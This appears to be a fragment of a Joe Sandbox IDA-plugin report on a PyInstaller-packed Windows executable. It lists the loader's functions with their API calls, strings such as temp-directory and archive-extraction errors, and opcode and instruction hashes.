                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbcac37ccba8d4fb81487e2dc58aab96d0fddb0f5958181c110f5c0263e0c824
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EED1D06BE2824286E720EF21D8505BB6761EF44F94F408176EA4DC7AE5EF3CE481E741

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                • Opcode ID: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                                                                                                                                                                • Instruction ID: e4c351c60c39d1d868e2ea848d9b0433d703451ff2cd6d0d6c6d242615fd1bd1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1C1B037B28A4285EB10CFA8C4906BE3B61FB49F98B115265DB2E9B7E4CF38D455D700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF67A60154F), ref: 00007FF67A6079F7
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A607B70: GetEnvironmentVariableW.KERNEL32(00007FF67A603A1F), ref: 00007FF67A607BAA
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A607B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF67A607BC7
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A617EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A617F05
                                                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32 ref: 00007FF67A607AB1
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A602B30: MessageBoxW.USER32 ref: 00007FF67A602C05
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                                • API String ID: 3752271684-1116378104
                                                                                                                                                                                                                • Opcode ID: 58413b646d7f7ab374e4e2c422a9b8d13a7d03e9344dd45300574a9025ad97e3
                                                                                                                                                                                                                • Instruction ID: c7dbc06aa827f557ad7f10d44f813365e9725df644a6c31f45f04c475d075b62
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58413b646d7f7ab374e4e2c422a9b8d13a7d03e9344dd45300574a9025ad97e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE518453B3960345F914FB6698216BB5241AF48FC1F4440B0DD4ECB7F7ED2CE541A640

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62671A
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A625E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A625E7C
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62672B
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A625E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A625E1C
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62673C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A625E38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A625E4C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: RtlFreeHeap.NTDLL(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B022
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: GetLastError.KERNEL32(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B02C
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67A62697C), ref: 00007FF67A626763
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                • Opcode ID: 111214f05bee2973e4e588afc78e556d255684e42b25d281897c943451d46a64
                                                                                                                                                                                                                • Instruction ID: 35c3367eb9f82a837f484f49fbdacd0c6a47e1d1d89a96bc2af6a840012bf0aa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 111214f05bee2973e4e588afc78e556d255684e42b25d281897c943451d46a64
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C515C77A2864286E720DF21E8915BB6761FF48F84F4041B6EA4DC3AB6DF3CE541A740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                • Opcode ID: 8cbeafd55435480eb4b41ebb52a05d3ef2c4ced4829aa63b63a0783ab33de0ca
                                                                                                                                                                                                                • Instruction ID: b12acf69e032478f8a2770ddfafff4fb5ea513ace66bc73b451a5385ddfb6254
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cbeafd55435480eb4b41ebb52a05d3ef2c4ced4829aa63b63a0783ab33de0ca
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F0A473A3878186F760CF64E489767B3A0EB44F28F004735D6AD466E4DF3CD0589A00

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                                                                                • API String ID: 2030045667-3833288071
                                                                                                                                                                                                                • Opcode ID: 55bd94f6007b30232ed0cfa4e1889d1d4adb7e37d938c4d6b6b55faef1642cfb
                                                                                                                                                                                                                • Instruction ID: 833cfb7f4cd5f491c1eda3dbdc81a3acbaf3d34bdd5bfead69c1e8fca655768c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55bd94f6007b30232ed0cfa4e1889d1d4adb7e37d938c4d6b6b55faef1642cfb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94518EA3B3864286EA11DB25E450ABB6791FF49F94F4404B1DE4C876F5EF3CE684A700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _fread_nolock$Message
                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 677216364-1384898525
                                                                                                                                                                                                                • Opcode ID: ca1d27e89982189e4f26c07087f6c95fdc921444c9bce541ef2ce41b92843714
                                                                                                                                                                                                                • Instruction ID: 24b13e13cd01dcae684a0f273a9b234f72a205909018c8e801c67f20886cbf10
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca1d27e89982189e4f26c07087f6c95fdc921444c9bce541ef2ce41b92843714
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53517DB3A2860286EB14DF28D45057B77A0EF48F84B554576DA4CC77B9EE3CE480DB44

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A603ED0: GetModuleFileNameW.KERNEL32(?,00007FF67A6039EA), ref: 00007FF67A603F01
                                                                                                                                                                                                                • SetDllDirectoryW.KERNEL32 ref: 00007FF67A603BF5
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A607B70: GetEnvironmentVariableW.KERNEL32(00007FF67A603A1F), ref: 00007FF67A607BAA
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A607B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF67A607BC7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                                • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                                • API String ID: 2344891160-1544818733
                                                                                                                                                                                                                • Opcode ID: 9ba03c8df16b21d72729e46afa2357ea2a33f66d8d25b75a636e029e11466fb5
                                                                                                                                                                                                                • Instruction ID: 4c7ad2c53083a0c8cfb30ca6c92c2effce73d6436a9ac1d68911ce9b4ea5d95c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ba03c8df16b21d72729e46afa2357ea2a33f66d8d25b75a636e029e11466fb5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FB18263A3CA8341EA28EB21D550ABF6250FF54F85F4001B5EA4DC76F6EF2CE584A700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                                • API String ID: 2895956056-3524285272
                                                                                                                                                                                                                • Opcode ID: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
                                                                                                                                                                                                                • Instruction ID: c927d2e59feedaba654d8bbdd02f66daa53c576af6de9483bee1ffca31dd96b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44414133A28B8285DA20DB24F4552ABB3A4FF94B60F500775E6AD87BE5DF7CD0449B00

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                • Opcode ID: 344160d0c59c7e0824ae8a956d407c8024153e1398207cbd26e900c139b7670f
                                                                                                                                                                                                                • Instruction ID: abe464cdc7a82b6f591d9e62bd724889c1ca207bf0f11968bbe81f0433077626
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 344160d0c59c7e0824ae8a956d407c8024153e1398207cbd26e900c139b7670f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4651DF63A3868285EA20AB51E4507BB6690FF84F94F4441B1EE4DC77E5EF3CE585E700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF67A61F66A,?,?,-00000018,00007FF67A61B417,?,?,?,00007FF67A61B30E,?,?,?,00007FF67A616552), ref: 00007FF67A61F44C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF67A61F66A,?,?,-00000018,00007FF67A61B417,?,?,?,00007FF67A61B30E,?,?,?,00007FF67A616552), ref: 00007FF67A61F458
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                • Opcode ID: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                                                                                                                                                                • Instruction ID: 64d6928fb8f846369e7b67c2182ee024bd414d3164dcdf568e0b1eba559aa1e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C411223B39A1241FA16CB16E8045B72791BF48FA0F494176DE1DC77A5DF3CE44AA340

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 700fa2322a5b373321a2e7ed848750029968f91a5ee85a64e34c26a04be16f04
                                                                                                                                                                                                                • Instruction ID: 3086ae04c5aff46703f530c0fd50c6ff3a33642889c243c7ff4b621d7a5fb9eb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 700fa2322a5b373321a2e7ed848750029968f91a5ee85a64e34c26a04be16f04
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DC1EE23A2CB8282EB609B55D0002BF7FA5EB80F80F5541B1DA4E873F1CE7DE855A700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                • Opcode ID: 3b4ff29bc97920ba2271d4a1c1e57abe4a5e4b0a83d431c25c67b1407b0ddbe5
                                                                                                                                                                                                                • Instruction ID: b8669f22e29bf6714b52fb5dd439fb9b17c0f6179c2f27b16440eabadf9f1cab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b4ff29bc97920ba2271d4a1c1e57abe4a5e4b0a83d431c25c67b1407b0ddbe5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE21413262864282EA11DF55E44457FB7A0FF85FA1F504675DAAC83AF8DF6CE8849700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: GetCurrentProcess.KERNEL32 ref: 00007FF67A608680
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: OpenProcessToken.ADVAPI32 ref: 00007FF67A608691
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: GetTokenInformation.KERNELBASE ref: 00007FF67A6086B6
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: GetLastError.KERNEL32 ref: 00007FF67A6086C0
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: GetTokenInformation.KERNELBASE ref: 00007FF67A608700
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF67A60871C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: CloseHandle.KERNEL32 ref: 00007FF67A608734
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00007FF67A603B6E), ref: 00007FF67A608A0C
                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF67A608A15
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                                                                                                                                                • API String ID: 6828938-1817031585
                                                                                                                                                                                                                • Opcode ID: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
                                                                                                                                                                                                                • Instruction ID: b3e804e56951190f6e941bab6c353bbadc56a032df9f0962ccebf29ec7e2cbe4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE215E23A38A4681F610EB20E445AEB7351EF58F81F4401B1EA4DC76F6DE3CE5859240

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF67A61D60B), ref: 00007FF67A61D73C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF67A61D60B), ref: 00007FF67A61D7C7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                • Opcode ID: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
                                                                                                                                                                                                                • Instruction ID: dc49f166e2840bb7911414a8c6c41195ede8625b88d960494866aeeda93c7796
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2891BE63E29A52D5F7619F65D4402BE2FA0EB44F88F1441B9DF0E96AA5DE3CE481E300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
